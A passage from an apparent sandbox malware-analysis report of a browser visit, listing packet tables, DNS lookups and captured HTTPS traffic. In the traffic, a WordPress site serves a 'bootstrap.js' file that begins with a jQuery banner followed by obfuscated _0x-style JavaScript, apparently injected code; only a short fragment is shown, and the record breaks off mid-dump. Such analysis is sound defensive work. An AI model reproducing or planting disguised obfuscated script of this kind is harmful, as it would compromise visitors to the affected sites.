Jan 7, 2025 13:41:50.312899113 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.312962055 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.313193083 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.313257933 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.326390028 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.326468945 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.326858997 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.326915979 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.327109098 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.327167034 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.327436924 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.327493906 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.327589035 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.327646017 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.328064919 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.328119040 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.328131914 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.328145981 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.328183889 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.328303099 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.328320980 CET	443	49738	77.68.14.124	192.168.2.4
Jan 7, 2025 13:41:50.328330994 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.328365088 CET	49738	443	192.168.2.4	77.68.14.124
Jan 7, 2025 13:41:50.343393087 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.346719027 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.346733093 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.347749949 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.347812891 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.348172903 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.348242044 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.348341942 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.348351002 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.388499022 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.445394039 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.446239948 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.446268082 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.446291924 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.446305037 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.446326017 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.446343899 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.453473091 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.453551054 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.453562021 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.453600883 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.453628063 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.453648090 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.453654051 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.453710079 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.453752041 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.453758955 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.453814983 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.461438894 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.508100986 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.535465002 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.535592079 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.535645008 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.535656929 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.535866976 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.535893917 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.535913944 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.535922050 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.535948992 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.535959959 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.535965919 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.536011934 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.536688089 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.536730051 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.536767960 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.536782026 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.536788940 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.536837101 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.537434101 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.542773008 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.542825937 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.542834044 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543036938 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543061018 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543073893 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.543081045 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543119907 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.543126106 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543595076 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543618917 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543641090 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.543648958 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543683052 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543694019 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.543700933 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.543751001 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.625350952 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.625360012 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.625410080 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.625428915 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.625441074 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.625473976 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.625498056 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.627085924 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.627104044 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.627180099 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.627187014 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.627260923 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.627903938 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.627957106 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:50.627974987 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.627996922 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.628216982 CET	49739	443	192.168.2.4	151.101.130.137
Jan 7, 2025 13:41:50.628241062 CET	443	49739	151.101.130.137	192.168.2.4
Jan 7, 2025 13:41:51.956542969 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:41:51.956566095 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:41:51.956621885 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:41:51.956840992 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:41:51.956856966 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:41:52.606791019 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:41:52.607070923 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:41:52.607090950 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:41:52.607949018 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:41:52.608010054 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:41:52.609236002 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:41:52.609293938 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:41:52.649079084 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:41:52.649095058 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:41:52.695962906 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:42:02.516062975 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:42:02.516118050 CET	443	49744	142.250.184.228	192.168.2.4
Jan 7, 2025 13:42:02.516185999 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:42:02.624902964 CET	49744	443	192.168.2.4	142.250.184.228
Jan 7, 2025 13:42:02.624931097 CET	443	49744	142.250.184.228	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 13:41:47.670639038 CET	58550	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:47.671000957 CET	60582	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:47.767591000 CET	53	52689	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:47.767611027 CET	53	50874	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:47.776540041 CET	53	58550	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:47.806668997 CET	53	60582	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:49.031100988 CET	53	62828	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:49.095282078 CET	55641	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:49.095421076 CET	62543	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:49.100274086 CET	50726	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:49.100548983 CET	63485	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:49.104624033 CET	53	62543	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:49.107094049 CET	53	50726	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:49.107764006 CET	53	63485	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:49.108884096 CET	53	55641	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:49.870697021 CET	62457	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:49.871287107 CET	63146	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:49.877897978 CET	53	63146	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:49.878237963 CET	53	62457	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:51.948673010 CET	64167	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:51.948801994 CET	58221	53	192.168.2.4	1.1.1.1
Jan 7, 2025 13:41:51.955298901 CET	53	64167	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:51.955758095 CET	53	58221	1.1.1.1	192.168.2.4
Jan 7, 2025 13:41:59.769130945 CET	53	56979	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 13:41:47.670639038 CET	192.168.2.4	1.1.1.1	0x953a	Standard query (0)	midcommunications.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:47.671000957 CET	192.168.2.4	1.1.1.1	0xe59b	Standard query (0)	midcommunications.com	65	IN (0x0001)	false
Jan 7, 2025 13:41:49.095282078 CET	192.168.2.4	1.1.1.1	0x9831	Standard query (0)	midcommunications.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.095421076 CET	192.168.2.4	1.1.1.1	0xf5dd	Standard query (0)	midcommunications.com	65	IN (0x0001)	false
Jan 7, 2025 13:41:49.100274086 CET	192.168.2.4	1.1.1.1	0x13c3	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.100548983 CET	192.168.2.4	1.1.1.1	0xb48c	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 7, 2025 13:41:49.870697021 CET	192.168.2.4	1.1.1.1	0x6c96	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.871287107 CET	192.168.2.4	1.1.1.1	0x2b9c	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 7, 2025 13:41:51.948673010 CET	192.168.2.4	1.1.1.1	0x931f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:51.948801994 CET	192.168.2.4	1.1.1.1	0xb6e2	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 13:41:47.776540041 CET	1.1.1.1	192.168.2.4	0x953a	No error (0)	midcommunications.com		77.68.14.124	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.107094049 CET	1.1.1.1	192.168.2.4	0x13c3	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.107094049 CET	1.1.1.1	192.168.2.4	0x13c3	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.107094049 CET	1.1.1.1	192.168.2.4	0x13c3	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.107094049 CET	1.1.1.1	192.168.2.4	0x13c3	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.108884096 CET	1.1.1.1	192.168.2.4	0x9831	No error (0)	midcommunications.com		77.68.14.124	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.878237963 CET	1.1.1.1	192.168.2.4	0x6c96	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.878237963 CET	1.1.1.1	192.168.2.4	0x6c96	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.878237963 CET	1.1.1.1	192.168.2.4	0x6c96	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.878237963 CET	1.1.1.1	192.168.2.4	0x6c96	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:49.889525890 CET	1.1.1.1	192.168.2.4	0x3e49	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 13:41:49.889525890 CET	1.1.1.1	192.168.2.4	0x3e49	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:50.954546928 CET	1.1.1.1	192.168.2.4	0x4f47	No error (0)	shed.dual-low.s-part-0033.t-0009.t-msedge.net	s-part-0033.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 13:41:50.954546928 CET	1.1.1.1	192.168.2.4	0x4f47	No error (0)	s-part-0033.t-0009.t-msedge.net		13.107.246.61	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:51.955298901 CET	1.1.1.1	192.168.2.4	0x931f	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:41:51.955758095 CET	1.1.1.1	192.168.2.4	0xb6e2	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

midcommunications.com

code.jquery.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	77.68.14.124	443	744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 12:41:48 UTC	517	OUT	GET /wp-includes/js/dist/bootstrap.js HTTP/1.1 Host: midcommunications.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-07 12:41:48 UTC	327	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:41:47 GMT Server: Apache Last-Modified: Mon, 06 Jan 2025 15:47:25 GMT Accept-Ranges: bytes Content-Length: 276886 Cache-Control: max-age=2592000 Expires: Thu, 06 Feb 2025 12:41:47 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: application/javascript
2025-01-07 12:41:48 UTC	7865	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 6a 71 75 65 72 79 2e 63 6f 6d 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 32 37 30 36 61 2c 5f 30 78 33 30 66 38 64 35 29 7b 76 61 72 20 5f 30 78 33 30 64 39 37 62 3d 5f 30 78 32 31 37 39 2c 5f 30 78 31 64 30 35 35 36 3d 5f 30 78 32 32 37 30 36 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 32 64 32 62 37 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 64 39 37 62 28 30 78 37 37 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 64 39 37 62 28 30 78 37 39 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 33 30 64 39 37 62 28 30 78 37 36 29 29 2f 30 78 33 29 2b 2d 70 61 72 Data Ascii: /! jQuery v3.6.0 jquery.com \| jquery.org/license /(function(_0x22706a,_0x30f8d5){var _0x30d97b=_0x2179,_0x1d0556=_0x22706a();while(!![]){try{var _0x52d2b7=parseInt(_0x30d97b(0x77))/0x1+parseInt(_0x30d97b(0x79))/0x2*(parseInt(_0x30d97b(0x76))/0x3)+-par
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 41 6a 75 73 74 69 66 79 25 37 44 2e 74 65 78 74 2d 6e 6f 77 72 61 70 25 37 42 77 68 69 74 65 2d 73 70 61 63 65 25 33 41 6e 6f 77 72 61 70 25 37 44 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 25 37 42 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 25 33 41 6c 6f 77 65 72 63 61 73 65 25 37 44 2e 74 65 78 74 2d 75 70 70 65 72 63 61 73 65 25 37 42 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 25 33 41 75 70 70 65 72 63 61 73 65 25 37 44 2e 74 65 78 74 2d 63 61 70 69 74 61 6c 69 7a 65 25 37 42 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 25 33 41 63 61 70 69 74 61 6c 69 7a 65 25 37 44 75 6c 25 32 43 6f 6c 25 37 42 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 30 25 33 42 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 25 33 41 31 30 70 78 25 37 44 75 6c 25 32 30 75 6c 25 32 43 75 6c 25 Data Ascii: Ajustify%7D.text-nowrap%7Bwhite-space%3Anowrap%7D.text-lowercase%7Btext-transform%3Alowercase%7D.text-uppercase%7Btext-transform%3Auppercase%7D.text-capitalize%7Btext-transform%3Acapitalize%7Dul%2Col%7Bmargin-top%3A0%3Bmargin-bottom%3A10px%7Dul%20ul%2Cul%
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 65 73 25 32 32 25 35 44 25 37 42 6f 76 65 72 66 6c 6f 77 25 33 41 68 69 64 64 65 6e 25 37 44 2e 74 65 78 74 2d 6c 65 66 74 25 37 42 74 65 78 74 2d 61 6c 69 67 6e 25 33 41 6c 65 66 74 25 37 44 2e 74 65 78 74 2d 72 69 67 68 74 25 37 42 74 65 78 74 2d 61 6c 69 67 6e 25 33 41 72 69 67 68 74 25 37 44 2e 6c 69 73 74 2d 75 6e 73 74 79 6c 65 64 25 37 42 70 61 64 64 69 6e 67 2d 6c 65 66 74 25 33 41 30 25 33 42 6c 69 73 74 2d 73 74 79 6c 65 25 33 41 6e 6f 6e 65 25 37 44 75 6c 25 37 42 70 61 64 64 69 6e 67 2d 6c 65 66 74 25 33 41 30 25 33 42 6c 69 73 74 2d 73 74 79 6c 65 25 33 41 6e 6f 6e 65 25 37 44 75 6c 25 32 43 6f 6c 25 37 42 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 32 30 70 78 25 33 42 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 25 33 41 32 30 70 78 25 37 44 75 6c 25 Data Ascii: es%22%5D%7Boverflow%3Ahidden%7D.text-left%7Btext-align%3Aleft%7D.text-right%7Btext-align%3Aright%7D.list-unstyled%7Bpadding-left%3A0%3Blist-style%3Anone%7Dul%7Bpadding-left%3A0%3Blist-style%3Anone%7Dul%2Col%7Bmargin-top%3A20px%3Bmargin-bottom%3A20px%7Dul%
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 36 25 37 42 72 69 67 68 74 25 33 41 32 35 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 37 25 37 42 72 69 67 68 74 25 33 41 32 39 2e 31 36 36 36 37 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 38 25 37 42 72 69 67 68 74 25 33 41 33 33 2e 33 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 39 25 37 42 72 69 67 68 74 25 33 41 33 37 2e 35 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 31 30 25 37 42 72 69 67 68 74 25 33 41 34 31 2e 36 36 36 36 37 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 31 31 25 37 42 72 69 67 68 74 25 33 41 34 35 2e 38 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 31 32 25 37 42 72 69 67 68 74 25 Data Ascii: 25%7D.col-sm-pull-6%7Bright%3A25%25%7D.col-sm-pull-7%7Bright%3A29.16667%25%7D.col-sm-pull-8%7Bright%3A33.33333%25%7D.col-sm-pull-9%7Bright%3A37.5%25%7D.col-sm-pull-10%7Bright%3A41.66667%25%7D.col-sm-pull-11%7Bright%3A45.83333%25%7D.col-sm-pull-12%7Bright%
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 37 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 32 33 25 37 42 77 69 64 74 68 25 33 41 39 35 2e 38 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 32 34 25 37 42 77 69 64 74 68 25 33 41 31 30 30 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 30 25 37 42 72 69 67 68 74 25 33 41 61 75 74 6f 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 31 25 37 42 72 69 67 68 74 25 33 41 34 2e 31 36 36 36 37 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 32 25 37 42 72 69 67 68 74 25 33 41 38 2e 33 33 33 33 33 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 33 25 37 42 72 69 67 68 74 25 33 41 31 32 2e 35 25 32 35 25 37 44 2e 63 6f 6c 2d 6c 67 2d 70 75 6c 6c 2d 34 25 37 42 72 69 67 68 74 25 33 41 31 36 2e 36 36 36 36 37 25 32 35 25 37 44 2e Data Ascii: 7%25%7D.col-lg-23%7Bwidth%3A95.83333%25%7D.col-lg-24%7Bwidth%3A100%25%7D.col-lg-pull-0%7Bright%3Aauto%7D.col-lg-pull-1%7Bright%3A4.16667%25%7D.col-lg-pull-2%7Bright%3A8.33333%25%7D.col-lg-pull-3%7Bright%3A12.5%25%7D.col-lg-pull-4%7Bright%3A16.66667%25%7D.
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 6c 61 79 25 33 41 62 6c 6f 63 6b 25 33 42 77 69 64 74 68 25 33 41 31 30 30 25 32 35 25 33 42 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 25 33 41 6e 6f 6e 65 25 37 44 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 25 37 42 68 65 69 67 68 74 25 33 41 61 75 74 6f 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 73 65 61 72 63 68 25 32 32 25 35 44 25 37 42 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 25 33 41 6e 6f 6e 65 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 64 61 74 65 25 32 32 25 35 44 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 74 69 6d 65 25 32 32 25 35 44 25 32 43 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 64 61 74 65 74 69 6d 65 2d 6c 6f 63 61 6c 25 32 32 Data Ascii: lay%3Ablock%3Bwidth%3A100%25%3Bbackground-image%3Anone%7Dtextarea.form-control%7Bheight%3Aauto%7Dinput%5Btype%3D%22search%22%5D%7B-webkit-appearance%3Anone%7Dinput%5Btype%3D%22date%22%5D%2Cinput%5Btype%3D%22time%22%5D%2Cinput%5Btype%3D%22datetime-local%22
2025-01-07 12:41:48 UTC	8000	IN	Data Raw: 41 25 32 33 66 66 66 25 33 42 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 30 25 33 42 62 6f 72 64 65 72 2d 73 74 79 6c 65 25 33 41 73 6f 6c 69 64 25 33 42 62 6f 72 64 65 72 2d 77 69 64 74 68 25 33 41 32 70 78 25 33 42 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 25 33 41 72 67 62 61 25 32 38 30 25 32 43 30 25 32 43 30 25 32 43 2e 36 25 32 39 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 72 61 64 69 6f 25 32 32 25 35 44 25 33 41 63 68 65 63 6b 65 64 25 33 41 25 33 41 2d 6d 73 2d 63 68 65 63 6b 25 37 42 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 30 25 33 42 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 25 33 41 25 32 33 30 30 36 37 62 38 25 37 44 69 6e 70 75 74 25 35 42 74 79 70 65 25 33 44 25 32 32 72 61 64 69 6f 25 32 32 25 35 44 25 33 41 68 6f 76 65 72 25 33 41 25 Data Ascii: 